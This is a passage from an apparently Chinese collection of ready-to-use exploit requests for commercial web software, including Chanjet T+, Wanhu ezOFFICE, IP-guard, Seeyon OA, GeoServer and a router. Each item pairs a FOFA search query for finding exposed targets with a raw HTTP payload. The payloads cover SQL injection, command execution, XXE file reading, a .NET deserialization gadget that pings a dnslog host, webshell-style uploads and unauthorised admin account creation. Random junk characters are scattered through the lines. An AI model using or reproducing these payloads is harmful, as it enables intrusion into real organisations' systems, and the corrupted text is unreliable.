) O4 e9 T/ P+ u# ?' b( O: t" f6 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.365 ^5 H% G1 W$ M8 i) N- ]3 W
Content-Type: application/json, e; x: M9 v( Y1 J- M1 I/ Q+ d1 X- N
: K# Z* x7 t- n( t& f0 ?8 P. E{% @( `% A; Y' a6 M1 f
"storeID":{; T9 q! I, c9 M$ [2 U
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",1 r4 m7 t; G z. d
"MethodName":"Start",
9 U6 }- `" V) V# E6 ~! W/ S "ObjectInstance":{5 n8 }5 d- Y. g, t! Z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* ~0 K/ M+ T: C* o( t
"StartInfo": {
1 t/ V# T# P b" ]$ T0 q4 ] "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" B( s! y* W) u' p* w4 s "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
: y3 E& X& {" a: ^9 Q }
. B* o, B- V: W3 K- Z: \+ Q0 v7 p }3 }( J. U8 [, x1 y1 A
}7 p4 W+ r* W! D5 g8 ]3 m1 n: l; p
}
% k$ ^ R6 x0 ?2 n8 |2 J
* O; h7 B5 W% t2 o0 L& Z. A/ _1 n' ~; E0 ^
57. 畅捷通T+ keyEdit.aspx SQL注入! r( t7 m: }# X, }: {
FOFA:app="畅捷通-TPlus"
/ a0 M4 N0 y' s) |% PGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1' J& H8 C7 J+ @) k1 Z
Host: host
7 L0 F4 C0 H. M( `' I) s- ^; {User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
- C9 P4 s/ E; H5 VAccept-Charset: utf-8 t' e X6 k: X6 y0 K
Accept-Encoding: gzip, deflate0 o& _6 G( @9 R# @
Connection: close' i0 T P1 V1 Y9 \7 X
9 |+ Y0 A8 k8 l7 L' P! V" I8 f1 z4 o5 S6 ^
58. 畅捷通T+ KeyInfoList.aspx sql注入$ c+ @1 n& w; {$ c- Q& q! F
FOFA:app="畅捷通-TPlus"/ t2 k% i5 q0 N9 M. A
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
m9 B* r1 |8 j$ Q& lHost: your-ip
# i( j! D+ Q* e c4 cUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
m- o& D5 ]6 S5 ?" ]Accept-Charset: utf-8
- \4 `' W) ^2 a( H/ kAccept-Encoding: gzip, deflate+ G- q) {4 f+ r: y/ R; x
Connection: close1 Q' E, f2 n& O3 O/ X
" y) `. h* v( l/ Y% T0 {
7 ^4 p5 m+ R. F3 Y# o- T59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行0 Z0 v e k- ?! X/ @
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"5 p! ?5 I$ C5 T# L- C) T0 j
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
( B/ K7 p" O( D! [$ S) o& fHost: 192.168.86.128:9090
. t2 o1 o' w, h1 Q# PUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
8 q$ @' \! {! E) g, ?Connection: close
/ a2 Y+ I' K# O2 a) X3 ?. Z& `" u& RContent-Length: 1669 j0 r( o# r/ R0 K8 m1 N
Accept: */*
* c9 q2 a& `# W0 x# I& HAccept-Language: en' X& O5 I, V3 x0 J6 s0 n
Content-Type: application/x-www-form-urlencoded/ R( k5 u {6 S3 K( }9 d
Accept-Encoding: gzip, W3 z& z5 z4 @ y" s6 ]
) R: \1 E# v c/ E1 XPAYLOAD
6 N0 G. d8 V) l# {) u9 V% u$ X7 r0 D. X/ Z% {3 e
6 l4 H! C( M: Z7 \& [0 T
60. 百卓Smart管理平台 importexport.php SQL注入6 l% G# T( Q8 T- o, A
FOFA:title="Smart管理平台"8 a) j% Q- ^" |. Q, k- b
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1 o- O4 F4 c( F0 T& E
Host:4 z9 i' S7 q7 r8 Q9 \- X6 b5 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* n2 J$ P5 a) C ^/ b A! Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 A3 }% c+ D3 a L/ ]& w% uAccept-Encoding: gzip, deflate# J( X4 Q9 K9 v$ `) q% \7 A; J0 C
Accept-Language: zh-CN,zh;q=0.9
& ~7 {) M/ I) q7 Y' {7 }Connection: close4 e$ ^- k8 o+ c$ Y: f
1 J3 h" n# K. R d3 U, \1 O) m
3 Y7 E, ? S' Z( O- R0 W& w61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 [1 J% {) L# z' j0 B3 u6 M6 n
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
# n- w5 @* I2 O6 }4 _POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1" U) r* U& Q. I% O5 [$ }
Host: x.x.x.x
& c3 S# k1 L% w- r- QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' u: S4 D+ W) k3 Z( G5 u' hConnection: close. A' S' R4 _ q/ M* {
Content-Length: 27
# W) S6 N& C+ {Accept: */*$ c6 r0 z3 m3 x5 y/ s
Accept-Encoding: gzip, deflate
5 K' J" \$ S) u- E( BAccept-Language: en$ \+ Y0 j/ l' l' c1 f
Content-Type: application/x-www-form-urlencoded4 _: G$ R3 s7 `/ d5 n: v
- m6 N$ G$ ], _
8uxssX66eqrqtKObcVa0kid98xa
: f1 h6 r; d( R8 u- J' U y* X4 m6 ?$ t# \/ d6 |6 j* m
; l# }+ }3 p7 V' A62. IP-guard WebServer 远程命令执行
3 L1 \4 c* j% dFOFA:"IP-guard" && icon_hash="2030860561"7 a% p4 H8 Z6 u( ~! K
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.18 h+ B7 B" z% j, {4 O/ r1 |, r
Host: x.x.x.x# }, r4 ~" y, v
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.365 p! y" d% a3 `4 D% E
Connection: close$ s7 s8 l. X9 x7 k
Accept: */*# J+ m; W6 L9 J2 O( A( h, i
Accept-Language: en# _2 D, N U+ S- E, q
Accept-Encoding: gzip
% y8 }6 U. i+ k" a$ J( p; U! }/ _4 T
4 G' p; Y, s) |/ ]2 N' d访问
: p4 ~$ M# r% M5 Y2 m
4 m9 j0 h& S: P/ x, xGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& F- p9 P: A/ x7 ?
Host: x.x.x.x
, |( {- l9 e X# O1 b/ n' Z! \ Y0 n, D6 n2 G7 C4 c
% b/ U# R' U& K4 `5 o n7 E8 V. O
63. IP-guard WebServer任意文件读取
% E* q: m) W- M% ^4 cIP-guard < 4.82.0609.0- d0 j4 t" o" _
FOFA:icon_hash="2030860561"1 t6 d0 X4 n$ j7 l8 C
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
, r+ |! o; C4 F7 [Host: your-ip6 w. W b' l- ], b" @& P- x! [; C1 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- f& m$ u& K9 `( G/ xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ G# o4 r3 {$ H1 x# y( TAccept-Encoding: gzip, deflate
' q. O0 T7 G1 cAccept-Language: zh-CN,zh;q=0.9 i; d! Z" X+ B% `
Connection: close7 ]' L( m" [6 q+ R
Content-Type: application/x-www-form-urlencoded
2 j2 X1 F# G1 m1 H2 F$ o6 N+ M. A" a
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
# n1 ?- S' k. X! y6 b# F
, ^) E6 a2 N Z( `64. 捷诚管理信息系统CWSFinanceCommon SQL注入
2 S2 A, F2 ~ N% D* o% W LFOFA:body="/Scripts/EnjoyMsg.js"
0 ]% _0 Z$ E8 k) c( sPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1# h' J* f# \3 O$ c9 r
Host: 192.168.86.128:90012 ]" m; c2 g1 O7 j! r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
" G8 b/ i$ p% u5 KConnection: close. Y9 h6 l8 [% n. _) ?* y
Content-Length: 369
9 U$ e& Z' t$ Q$ W! RAccept: */*
& ^5 s" Z( u- g' YAccept-Language: en! s/ A9 F: W. y. R# y
Content-Type: text/xml; charset=utf-8
Y! m" c; H4 ?- |0 f! @Accept-Encoding: gzip( \+ p7 Q$ u! _5 R6 ]
0 f/ r0 `+ F0 R. { h0 N9 H
<?xml version="1.0" encoding="utf-8"?>3 F/ n% P' E2 t
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">7 `: t1 U. x+ f3 y$ w
<soap:Body>
9 t1 v4 X' G; N; D" l <GetOSpById xmlns="http://tempuri.org/">
9 a) I4 r0 o% ~3 y+ i) E <sId>1';waitfor delay '0:0:5'--+</sId>
6 B* {( B, f/ @1 K2 F </GetOSpById>
& O) u0 R& h6 ~7 c: N, ]% h$ ` </soap:Body>
$ j! D$ C' Z% \: k</soap:Envelope>" `' p. u* V7 t! T" P
$ R/ O$ q [0 b8 }' {3 Z* }( W$ D, J
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
Y: `' ]* v2 e. {1 E$ A0 z$ P4 sFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台" s; }0 i* D2 W0 x: A
响应200即成功创建账号test123456/1234568 G8 V( |3 d( ^7 g3 ^
POST /SystemMng.ashx HTTP/1.1
8 Q7 P% ^8 |; M( P _0 a7 BHost:
! y+ C; k( j- N) n: lUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
: o" ]& F+ x8 G2 rAccept-Encoding: gzip, deflate
# y; @$ X' ^; w8 nAccept: */*. j; @- c/ n" D: P& w+ D: m
Connection: close" I$ Z( ]2 J# V2 n1 x- M
Accept-Language: en
@" Q( [6 H0 M* UContent-Length: 174
) h7 U, G ?' U+ H2 W
3 ^0 z9 }! u9 G( P2 V! ]# _operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators- i: D! H1 U, _& p
* ~: V. e4 w5 C
B. z# e, A; ?1 f8 v- t66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入) H" k9 ]- D, ^3 F
FOFA:app="万户ezOFFICE协同管理平台"
& T) k6 }6 B7 q6 `, S ~& I. Z( |( c
" B+ [- Z" C& o! ?$ u( CGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.10 u) ~' q, G2 b: p
Host: x.x.x.x" O8 Y& I2 {! L* M( n! I% @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
- M* u+ X, N7 r+ M8 W7 ~) GConnection: close9 t8 W2 `! Z8 ?) q; @8 H
Accept: */*4 O! ?( k* f( e5 R2 O& e
Accept-Language: en: `. S5 T3 j. Q+ }' I4 t
Accept-Encoding: gzip% M! L1 v& ]) V3 C: k# O. B
( b+ V0 Z+ E5 h0 x9 M" O
1 z2 F/ D7 U8 e第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在* }1 {7 K f$ D" G! U
, A; S! U3 n( W67. 万户ezOFFICE wpsservlet任意文件上传, U8 l( g' S" _9 M' O! ?
FOFA:app="万户网络-ezOFFICE"
7 O" Z* q8 i' W% QnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型" {2 }! i7 [$ T! A* y
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
& [: A M" e3 b$ I* [7 T' SHost: x.x.x.x
: r- M7 O' }& U" E% K4 j; lUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
7 {1 d0 r7 F9 O3 A! C6 _Content-Length: 1733 U+ |5 C$ ~ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.88 U3 S0 w- F h# _" ^
Accept-Encoding: gzip, deflate
9 G) e& k8 Y, Z, o( X% ^$ U: tAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
3 h9 r1 [" Y% M" p( I0 P2 S6 nConnection: close
: s, x, a+ d: ?2 O/ |Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp( N; W( g# y' |9 j8 U
DNT: 1
9 X2 v5 r* u; K) k2 {Upgrade-Insecure-Requests: 17 C& s! W& s" L8 t% ]1 W t2 r( O
5 v1 Z5 t9 ^8 t" k4 g4 E3 `: J
--ufuadpxathqvxfqnuyuqaozvseiueerp W' c% n) t+ ]' [3 E% ? J q
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"5 s! r' N9 i* X J2 Y& `8 L
, H4 X6 A& L- y" ]+ n2 j, Z
<% out.print("sasdfghjkj");%>
2 P9 \; Q0 a+ }5 Q: E0 q8 _7 q--ufuadpxathqvxfqnuyuqaozvseiueerp--, r: ^! I9 Y8 U% B. T1 G9 R% M
& ? k) N- F. @- L
. m* h/ Z5 ]! J! A- |6 C4 k文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp! y. B: f: @6 G8 s9 I# d
# z8 x5 U @1 }2 b% y& D
68. 万户ezOFFICE wf_printnum.jsp SQL注入
, O( m/ X$ X9 n' u7 QFOFA:app="万户ezOFFICE协同管理平台"# B& Y' a9 e9 V! `+ S
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
% W# g# Y) n& w- d& eHost: {{host}}0 R2 I- F& w) X+ J% q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36% R k. G( m& M
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
' T, L9 _- C/ Z3 i1 m+ R( JAccept-Encoding: gzip, deflate
5 n3 T8 Z/ s8 y8 F" ~* B( Q2 ~Accept-Language: zh-CN,zh;q=0.9
7 D! e2 R) U o$ bConnection: close! v1 h! n# K ~' v& [1 A- T
- P1 p. ]# @3 }# r" D, G/ G
' D; z# v! h5 ^5 K: r. K69. 万户 ezOFFICE contract_gd.jsp SQL注入0 f; |$ C4 R3 {# ]# x8 N# x, j
FOFA:app="万户ezOFFICE协同管理平台"
* t/ ]% t7 V6 S% O' m' a' FGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
$ | b1 b: z- c4 u& ]7 NHost: your-ip
3 L. T+ |. B5 _( U# `" I& j! uUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$ ^/ Y# y- D0 m& S: p
Accept-Encoding: gzip, deflate
! F/ N0 n7 v' @Accept: */*4 w7 k0 \+ }% o0 D' u
Connection: keep-alive
% H1 _/ I/ ]; G1 ]8 m0 l
) @+ B; v0 g# @% d. R* m: @ ?$ O5 f, d( q* O
70. 万户ezEIP success 命令执行7 i; T0 Q0 ]' }/ P. F
FOFA:app="万户网络-ezEIP"
$ h/ y1 O: F0 `. RPOST /member/success.aspx HTTP/1.1 {3 ` k: M! _* {+ Y. D2 o' r9 x
Host: {{Hostname}}) J7 U& O# d# H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
, H% f. [$ r: B/ F/ SSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=9 q$ Y) E) t; m
Content-Type: application/x-www-form-urlencoded7 Y. B+ N! e( O! O. _2 Y+ D7 f
TYPE: C, h- w9 E8 r6 y
Content-Length: 16702- U! r2 p( B T* S- P7 z7 i/ W
5 n; T1 X# l2 \8 S
__VIEWSTATE=PAYLOAD/ E" y" a3 a8 {& O
3 ~6 f; j& S4 e1 H, D! e6 |$ B' L
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, R+ s* U% o. ^1 [; s: B/ K
FOFA:body="PM2项目管理系统BS版增强工具.zip"( l1 M6 }7 |% ^
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
; I; h' n1 d! M! D% z6 MHost: x.x.x.xx.x.x.x; N" w* Y' \: s+ l. r
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36) U9 m+ O' ]* \' B, Y9 \
Connection: close7 W+ j, {) F1 b1 t" V, T& Y: Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ V1 S7 g- t+ t6 U
Accept-Encoding: gzip, deflate
; W) c' a0 Z* BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% N2 E* _' C6 p$ PUpgrade-Insecure-Requests: 10 f' ^' s6 l/ C4 b" ^* U7 X
( r2 [* l( g0 ?6 j: M; G) U* z" T
7 y5 l" f% |( n1 E# E$ h: `; Y72. 致远OA getAjaxDataServlet XXE8 D" B$ h0 [. _5 @9 w S5 ~
FOFA:app="致远互联-OA"/ I$ {- f3 |% d
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1 z' t9 O* ~) ?, r( i8 _* y/ a
Host: 192.168.40.131:8099
D* i+ I4 V3 Y$ u7 B2 yUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
5 Q& a9 M# f: b- W. w0 JConnection: close3 `* i: B# j/ t+ R' i& W/ k- b
Content-Length: 583
$ C$ j2 c% y$ P# j% SContent-Type: application/x-www-form-urlencoded7 V \' j+ E" w4 I. p4 M+ z9 ]5 c# W' l
Accept-Encoding: gzip* r, m: X1 ~; f( S, u0 F7 W
* D5 h% K0 D7 d' n
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E* m0 ]$ @* r$ `. |
s$ F9 d0 M, I' H$ d4 p) P7 `! D
! h1 N# W: X' _) X9 g1 Z73. GeoServer wms远程代码执行& E4 j4 I& \" q0 k! q
FOFA:icon_hash=”97540678”- x3 i3 s o G6 q6 ^! b; q
POST /geoserver/wms HTTP/1.1
! [+ ]" P3 P J9 }" vHost:
2 P5 p7 @! h0 _* x* N0 I5 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 E& z1 F8 o9 C5 W' a/ a: S
Content-Length: 1981
$ ]( j" k( W* f2 m1 G, z8 WAccept-Encoding: gzip, deflate
" q# F: J, `. r, N1 ]' YConnection: close
# a C! T. J+ u$ a& N5 IContent-Type: application/xml2 ?2 ? w9 q: a1 f% ?! e
SL-CE-SUID: 3
5 P4 i, M: w7 e8 Y$ A6 Q/ d! f: L+ k6 m, w
PAYLOAD, Z1 e3 e- L5 F) n9 w
8 j( e. U$ J. h7 D: s0 L& P
8 o2 W( _3 K- ?
74. 致远M3-server 6_1sp1 反序列化RCE" @0 X. z% n! A8 |4 m8 U
FOFA:title="M3-Server"
" ~' ~; y) g6 v. ~, |$ L/ ~PAYLOAD
& a& z; G% ]2 d/ g, F& X+ ? D) T% S9 s6 d+ h7 V1 @
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE1 ]7 s7 ^& Y4 ^! p7 X. _* z
FOFA:app="TELESQUARE-TLR-2005KSH"
7 P* f6 t2 Q. S* J! s: lGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1$ R) X2 A0 n8 \
Host: x.x.x.x+ R5 N t& j5 t: S7 Q" K( \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ q" m+ |: A8 z& @9 J) W6 T4 P; EConnection: close w% G/ a! {4 _! {! ]* d$ @5 W
Accept: */*
' o, Y' G2 [4 M3 g6 mAccept-Language: en
9 ?8 p7 q3 I( c) RAccept-Encoding: gzip4 N- d7 i) O' s; _; Y& h& _# v' Q) w
! C, r; @4 o9 L. n& ?, L, |) j/ S1 [
& g! q8 C+ c$ ?GET /cgi-bin/test28256.txt HTTP/1.1
& g! ^7 `9 A8 x$ B4 c: X" {/ nHost: x.x.x.x7 T: D1 ]) E$ c; D' v. q
5 w" `; Y" s: O8 C& e: }
# l8 S0 N- W' Y) ?, p76. 新开普掌上校园服务管理平台service.action远程命令执行
; `2 T8 {" P/ e+ d5 m- i1 CFOFA:title="掌上校园服务管理平台"
0 A/ Y$ b1 y. e5 U" K$ S% RPOST /service_transport/service.action HTTP/1.19 g U4 o0 H& N. h$ X
Host: x.x.x.x/ r( J% c7 c- b" X/ R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 p/ H3 v+ [9 k$ Q' q" |5 X
Connection: close
: x, F3 d# ?3 t& x* X+ t% tContent-Length: 2117 w9 x5 [" y9 H: a$ }% X' [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 ]/ b5 w3 v- H6 r+ k
Accept-Encoding: gzip, deflate
6 `* v8 o( M& C& M) A( Q3 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 y! `: M% W7 g( [; I. l2 aCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4! e P4 X' U1 h& A- Q! W
Upgrade-Insecure-Requests: 11 z0 x2 |2 y6 ~$ I
- K% I& b) I. Y; x7 \5 W* N{
r6 H9 M% _9 t% s1 I2 T. M; ^/ b"command": "GetFZinfo", d+ {% d* \. p
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 g5 m' R, B% S" N$ ^3 m ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
9 a+ _+ ?2 S/ w% Q} `- n8 T9 Y E( p! s1 S( L* c
7 l* M( Z) s' N" q. g$ `
6 f+ b$ L8 H5 h5 U6 D; fGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.19 M+ ]- F: ~" i8 l* h5 t+ {
Host: x.x.x.x
: c9 x/ c0 W: `' ~+ _7 A/ h% X5 @/ B
' l; [4 M- `5 r$ C$ Y9 _+ b+ u0 J8 V2 ?
77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 a1 m7 K& `) q* r7 e8 Q
FOFA:body="F22WEB登陆"
) l- g( m$ X/ N& m' aPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.16 G1 O/ _$ e4 p: P! M* o
Host: x.x.x.x
, M5 ?) J$ Z4 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.363 U; n% k9 f- G7 q9 P" @7 ~8 x: d
Connection: close
) X; `9 J# o" B0 q6 n# E6 Q7 wContent-Length: 433
2 b5 d- r/ |' e% nAccept: */*
# a k' @! _, f) Y# [) v$ p6 KAccept-Encoding: gzip, deflate0 L5 L8 O- |+ s$ N2 B4 v
Accept-Language: zh-CN,zh;q=0.98 Z( m- c* ]; u: E
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
0 E+ ^$ |# |! ^0 o5 E3 A: w; t; Z; N
------------398jnjVTTlDVXHlE7yYnfwBoix4 J/ {+ Q! R- Y4 O8 N/ K9 w
Content-Disposition: form-data; name="folder"" K4 w+ n0 X& q2 n5 m& j9 L! U! i* E' x
& @/ t& y3 h$ M/ f2 u0 F
/upload/udplog
2 L. t: T. {" D6 c' ~------------398jnjVTTlDVXHlE7yYnfwBoix
" k3 l `5 p+ x% B. D: c. gContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
; V8 F5 w; j* w4 x9 D) R2 R! TContent-Type: application/octet-stream
: E( e6 |8 [2 N o" D# i+ P0 K8 K8 }" T/ u
hello12345671 l3 _/ W( k9 S- C9 O
------------398jnjVTTlDVXHlE7yYnfwBoix
1 Y1 }- x/ t# }3 B9 \" H9 fContent-Disposition: form-data; name="Upload"
q# |9 x5 B. r( F+ M- ]& Q2 K2 {7 F1 v
Submit Query
* ]# Q) M, x* o) Y3 O" T------------398jnjVTTlDVXHlE7yYnfwBoix--! Z/ t2 ]. m) ~2 s
* }) Z5 O& W ~3 l0 r* ?
. p; b2 E3 ^, ]
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
5 {$ T* W1 G2 Q8 v) X9 C' U6 NFOFA:icon_hash="2001627082"/ t3 }: u' v4 q9 W$ y8 D
POST /Platform/System/FileUpload.ashx HTTP/1.1
: ^3 [" b8 M. B3 e* `Host: x.x.x.x
; n n0 }& g' f y% EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% x$ @/ A# r3 m
Connection: close: C0 K; Z1 k8 I: S# z. H
Content-Length: 3368 k# T, A3 V8 g* o
Accept-Encoding: gzip$ [9 p& A8 n8 E* }: U; y
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
/ u4 @+ z2 R2 R$ }9 e
, k9 Z4 T+ B9 }4 u+ Z------YsOxWxSvj1KyZow1PTsh98fdu6l
# D& ~" K' B0 VContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
1 \( w$ c( y/ `7 T( z2 FContent-Type: image/png6 a; k3 z% v3 G# x- L+ h
: C% K3 F& M) d
YsOxWxSvj1KyZow1PTsh98fdu6l
5 T1 q6 r6 s) `+ Z4 \# a------YsOxWxSvj1KyZow1PTsh98fdu6l
2 U! N. y* T% ] d7 U0 nContent-Disposition: form-data; name="target"
+ K1 `7 i! h4 E. y; b
' |+ ~! P# E/ U; \4 x4 w/Applications/SkillDevelopAndEHS/' ^/ o5 A- V" V
------YsOxWxSvj1KyZow1PTsh98fdu6l--
